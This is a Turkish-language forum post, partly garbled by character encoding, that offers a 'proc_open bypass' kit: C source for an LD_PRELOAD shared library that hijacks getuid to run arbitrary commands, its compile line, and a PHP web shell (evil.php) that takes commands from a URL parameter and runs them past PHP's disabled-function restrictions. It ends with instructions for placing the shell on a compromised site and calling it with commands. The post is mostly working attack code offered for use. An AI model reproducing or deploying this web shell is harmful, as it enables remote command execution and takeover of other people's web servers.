Skip to main content

Proc open Bypass tools

Eski bir tekniktir ama iþe yaradýðý serverler hala var.
a.c kodu:

Code:
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
int getuid()
{
char *en;
char *buf=malloc(300);
FILE *a;

unsetenv("LD_PRELOAD");
a=fopen(".comm","r");
buf=fgets(buf,100,a);
write(2,buf,strlen(buf));
fclose(a);
rename("a.so","b.so");
system(buf);
system("mv output.txt .comm1");
rename("b.so","a.so");
free(buf);
return 0;
}
derlemesi:cc -o a.so - fPIC - shared a.c

evil.php kodu:
Code:
<?php 

$path="/var/www"; //change to your writable path 


$a=fopen($path."/.comm","w"); 
fputs($a,$_GET["c"]); 
fclose($a); 

$descriptorspec = array( 
 0 => array("pipe", "r"), 
 1 => array("file", $path."/output.txt","w"), 
 2 => array("file", $path."/errors.txt", "a" ) 
); 

$cwd = '.'; 
$env = array('LD_PRELOAD' => $path."/a.so"); 
$process = proc_open('id > /tmp/a', $descriptorspec, $pipes, $cwd, $env); // example command - should not succeed 


sleep(1); 
$a=fopen($path."/.comm1","r"); 

echo "<pre><b>"; 
while (!feof($a)) 
{$b=fgets($a);echo $b;} 
fclose($a); 
echo "</pre>"; 

?>
$ path =" /home/xxxxxx/public_html/dizin/; <----- bu kýsmý sheli attýðýnýz yere göre düzenleyin

bypass.www.site.com/evil.php?c=komut

Share this with your friends
Loading...